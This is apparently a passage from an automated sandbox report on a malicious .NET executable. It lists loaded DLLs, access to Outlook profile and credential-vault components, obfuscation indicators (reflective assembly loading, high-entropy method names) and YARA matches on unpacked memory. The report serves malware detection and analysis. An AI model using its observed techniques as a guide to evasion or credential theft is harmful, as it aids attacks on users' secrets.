            Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: 0.2.file.exe.70f0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.cs.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])
            Source: 0.2.file.exe.381d400.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs.Net Code: gHQexYK344 System.Reflection.Assembly.Load(byte[])
            Source: Yara matchFile source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 7716, type: MEMORYSTR
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06748A90 pushfd ; retf 0_2_06748A91
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06748A92 pushad ; retf 0_2_06748A99
            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AFC
            Source: file.exeStatic PE information: section name: .text entropy: 7.9227520273220895
            Source: 0.2.file.exe.70f0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csHigh entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, BDLA7ZzmjyZeMHspbI.csHigh entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, dhK9KbNqZASI81hGMI.csHigh entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, eWbKPQURAh7q0dXmWQa.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, blpmsJDcqDTfApNEE9.csHigh entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, asC2VyhwMrPC2xZIhl.csHigh entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, rXxk4UXv0hG6nJr2r4.csHigh entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, wtca6eCuhSEXbwj87j.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, Y1v65cTfYUkeaqQPAC.csHigh entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, Urg7ubUUcCev0u1dT4r.csHigh entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, e7gKPApuQs0EWyVG9T.csHigh entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, ywjJDxuXXl5HvcWFju.csHigh entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, BE5k0LFu5KnoWIB8ne.csHigh entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, hlfKZ6407CBnHJSie5.csHigh entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, mO72Zbe7qFQORHthPZ.csHigh entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, BwnBSkUenCTHkiiG70o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, kvk9jqBMEXOK4a7rYr.csHigh entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, iWse1KSS7gaYi41xLP.csHigh entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, eqDwEc5eNbqOMrRccw.csHigh entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, lBiWxolWI4mIKrpo6Q.csHigh entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, eenOKjUBoGmHCNGsevJ.csHigh entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, urCQEP7xb0Mxs3L7dv.csHigh entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
            Source: 0.2.file.exe.70f0000.5.raw.unpack, x76f1hkrmI3Lkqhn4k.csHigh entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'
            Source: 0.2.file.exe.381d400.3.raw.unpack, KQkH3in3AYxtB1JkcI.csHigh entropy of concatenated method names: 'gwb8vauN76', 'coJ8KZpJSC', 'fZs8T6XHIb', 'uqG8CFeqcY', 'Xrh8GBbB4F', 'F5A8QvMX8N', 'Mhg8iMMyDK', 'IwJ8nhpBnt', 'ppo8rHM5l3', 'zKB8VcEgFn'
            Source: 0.2.file.exe.381d400.3.raw.unpack, BDLA7ZzmjyZeMHspbI.csHigh entropy of concatenated method names: 'pYcc3qb4LP', 'iVMcFnRmTf', 'kjSch2OmFh', 'dPKcNtftA0', 'ep5cukejfW', 'DLtcmCOIuX', 'lWKctS9MXy', 'aH8c6uleZm', 'Py5cgNOThj', 'aoVcHMdwZP'
            Source: 0.2.file.exe.381d400.3.raw.unpack, dhK9KbNqZASI81hGMI.csHigh entropy of concatenated method names: 'sfGQv3qveH', 'Gk1QTJCxla', 'PF0QGPZ0c9', 'ecJQiiiaj1', 'k6KQn6iR71', 'XSqGYjTQNd', 'dr0GDj07xW', 'z70GSox8Zc', 'UUbGWZII6b', 'n2XGkeHKAq'
            Source: 0.2.file.exe.381d400.3.raw.unpack, eWbKPQURAh7q0dXmWQa.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'g6Ics1b5Q4', 'lHScanO8Hq', 'nGHc7Kj1b4', 'Nkvc4EEFTo', 'W1ncOKfXll', 'RBGc1YrhiV', 'W60cEbFZA3'
            Source: 0.2.file.exe.381d400.3.raw.unpack, blpmsJDcqDTfApNEE9.csHigh entropy of concatenated method names: 'sXHIWBvUB1', 'gM3IXliyxi', 'LAkjRqtjrT', 'irsjUBXqk4', 'suWIscc6eO', 'adBIa4DbBY', 'bhgI7Ap3yt', 'JJPI44IQ2E', 'x1FIOfmaQo', 'J1LI18bvGD'
            Source: 0.2.file.exe.381d400.3.raw.unpack, asC2VyhwMrPC2xZIhl.csHigh entropy of concatenated method names: 'ARKCb4vRER', 'PfqC3SbNpI', 'gFNCFAwu0h', 'N7QChL3WU5', 'egwCMgpiYw', 'gXBCZhOmb9', 'HiyCI68I54', 'NnfCj0kphm', 'uQfCdb2Dm9', 'VKQCcjYmRN'
            Source: 0.2.file.exe.381d400.3.raw.unpack, rXxk4UXv0hG6nJr2r4.csHigh entropy of concatenated method names: 'NY8cCHPCTo', 'v1YcGMuL0j', 'PlDcQ98GnS', 'gHrci7Rn0Y', 'LTtcdZa6tk', 'WgxcnQGGAx', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.file.exe.381d400.3.raw.unpack, wtca6eCuhSEXbwj87j.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NPhBk6IATb', 'NUrBXV5rDr', 'w4vBzP3VTO', 'Fum8R26vkD', 'BSQ8UGxs3m', 'FAr8ByJM0s', 'KyD88tXy3T', 'HwpHMYNZUsK33x2B4cE'
            Source: 0.2.file.exe.381d400.3.raw.unpack, Y1v65cTfYUkeaqQPAC.csHigh entropy of concatenated method names: 'Dispose', 'xaYUki41xL', 'hXyBuxl6Ko', 'sWJJotluKH', 'NwmUXu8WJh', 'n33Uzq0LEr', 'ProcessDialogKey', 'eg6BR76f1h', 'lmIBU3Lkqh', 'k4kBBdXxk4'
            Source: 0.2.file.exe.381d400.3.raw.unpack, Urg7ubUUcCev0u1dT4r.csHigh entropy of concatenated method names: 'x1jcXgXCGN', 'fvScz1QqAG', 'XKdfRDMKeD', 'LkffUlITX0', 'gnrfBIBAS5', 'AUdf8iyEhN', 'OqwfeZeTlt', 'XAwfvt7blr', 'PnmfKyehow', 'jKVfTiMyVU'
            Source: 0.2.file.exe.381d400.3.raw.unpack, e7gKPApuQs0EWyVG9T.csHigh entropy of concatenated method names: 'YtHQ1avdnI', 'sCKQEBr9Vg', 'RWkQYVTVi9', 'ToString', 'plbQDysEAl', 'QkLQSVFMsJ', 'tyg4QgZnFbC608q3Vvw', 'upiOboZCPTUWbVTJlXN', 'Gr55C2Z22jsqV8xooje'
            Source: 0.2.file.exe.381d400.3.raw.unpack, ywjJDxuXXl5HvcWFju.csHigh entropy of concatenated method names: 'jd1XQnZrwVnLTEDCpNd', 'KywlMNZsQBmADPfNGNl', 'EO5xIiZj2NflMbVFU0Z', 'bmHQjhGy3F', 'nonQdcl1E2', 'QAuQcAH5On', 'J0YoVWZ0gtheKhdG88p', 'Cx56OgZEqBuvdXaLqeJ', 'i4yDHfZGP0q4hERawKj'
            Source: 0.2.file.exe.381d400.3.raw.unpack, BE5k0LFu5KnoWIB8ne.csHigh entropy of concatenated method names: 'QPjT47v345', 'bMaTO5YD1n', 'qL4T1ROcj5', 'B15TEN4D6d', 'noKTY6WZW0', 'KIATDaS7hq', 'wqZTSXrG3c', 'UUKTWm9AvU', 'JPFTkkWlg3', 'zCGTXs1q8C'
            Source: 0.2.file.exe.381d400.3.raw.unpack, hlfKZ6407CBnHJSie5.csHigh entropy of concatenated method names: 'Q4eMPdDINF', 'dABMaa0v9G', 'm1iM46hmGb', 'F35MOwisjH', 'gV1MuYpY1I', 'NEEM9yiVrf', 'T49MmVVXB8', 'vepMttiwtX', 'mSgMp2U8YB', 'OrnM5Qgsgs'
            Source: 0.2.file.exe.381d400.3.raw.unpack, mO72Zbe7qFQORHthPZ.csHigh entropy of concatenated method names: 'IGyUiE5k0L', 'H5KUnnoWIB', 'BwMUVrPC2x', 'pIhUqlJdZP', 'PPIUMX2ehK', 'HKbUZqZASI', 'DrLniM6qODKrhYmosh', 'nIUaEjW6YOpveRetEf', 'lhUUUXaivS', 'm33U8VTlfn'
            Source: 0.2.file.exe.381d400.3.raw.unpack, BwnBSkUenCTHkiiG70o.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 't9EwdUeNcg', 'GcswcCxhlR', 'javwf2GxHL', 'M0CwwEMwtd', 'Q2vw2fUeVe', 'b1uwLEqNHF', 'ty2w6esgdc'
            Source: 0.2.file.exe.381d400.3.raw.unpack, kvk9jqBMEXOK4a7rYr.csHigh entropy of concatenated method names: 'UuhxF135Y', 'XnebOGXXx', 'gxo3kDLoB', 'IZJ0qtrjN', 'ArxhXNkJK', 'HajJcBQ7r', 'n91mUTemEhJ9mZBp51', 'RNVkhEo862ysWOUwJ8', 'K5EjtOTxM', 'YgrcQvyG5'
            Source: 0.2.file.exe.381d400.3.raw.unpack, iWse1KSS7gaYi41xLP.csHigh entropy of concatenated method names: 'K0RdMuvAqt', 'BmMdIEKRT2', 'RJfddnVaQa', 'fcWdf4WTkd', 'FJpd2JdMAg', 'XKNd6ZbKD7', 'Dispose', 'S0pjKughCJ', 'Jr6jTQ28or', 'sGujCe3UVH'
            Source: 0.2.file.exe.381d400.3.raw.unpack, eqDwEc5eNbqOMrRccw.csHigh entropy of concatenated method names: 'wsUiKpO8LJ', 'mKeiCuOl5m', 'c76iQWyI7L', 'dG5QXo2Ph5', 's31QzmMPm6', 'tdCiRDR4Xc', 'uVniU0FJwJ', 'vCpiBNnNh2', 'C33i8WyDuh', 'C2FienmEHx'
            Source: 0.2.file.exe.381d400.3.raw.unpack, lBiWxolWI4mIKrpo6Q.csHigh entropy of concatenated method names: 'c6sigqBTbc', 'bA5iHPDRJZ', 'nVIix7HMEI', 'lu8ibUgJBG', 'xQBiyYxTKA', 'Uu3i30xC8r', 'tkNi0FhmID', 'g94iF3DidF', 'LljihX3H7C', 'EeQiJ9voDB'
            Source: 0.2.file.exe.381d400.3.raw.unpack, eenOKjUBoGmHCNGsevJ.csHigh entropy of concatenated method names: 'ToString', 'dynfFoMNSH', 'NPbfhRtonL', 'EsyfJMHbTy', 'SVXfNgrEu2', 'gXWfupVDI1', 'SHPf95laLM', 'jw8fm0999e', 'fKvmhvcqCxomhRmxrhd', 'yiGgBXc63lwjv54kfh4'
            Source: 0.2.file.exe.381d400.3.raw.unpack, urCQEP7xb0Mxs3L7dv.csHigh entropy of concatenated method names: 'RvKAFRNiNm', 'LurAhHQlM9', 'T4WANS9Td2', 'zsCAu6BpFD', 'rgOAmBGW2g', 'rqsAtd3WxD', 'soHA5yy9T5', 'ydbAoD9Y2p', 'hKxAPfH77o', 'nuVAs99LcQ'
            Source: 0.2.file.exe.381d400.3.raw.unpack, x76f1hkrmI3Lkqhn4k.csHigh entropy of concatenated method names: 'E0fdNAeGf6', 'b0Idu8bJEp', 'twmd91E48s', 'oKldmWYHus', 'MhbdtHQOm8', 'RPXdp8Pfdb', 'ArPd5HbWfX', 'Uw5doQYgDG', 'QX0dlENjSW', 'cr1dPT1aQr'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
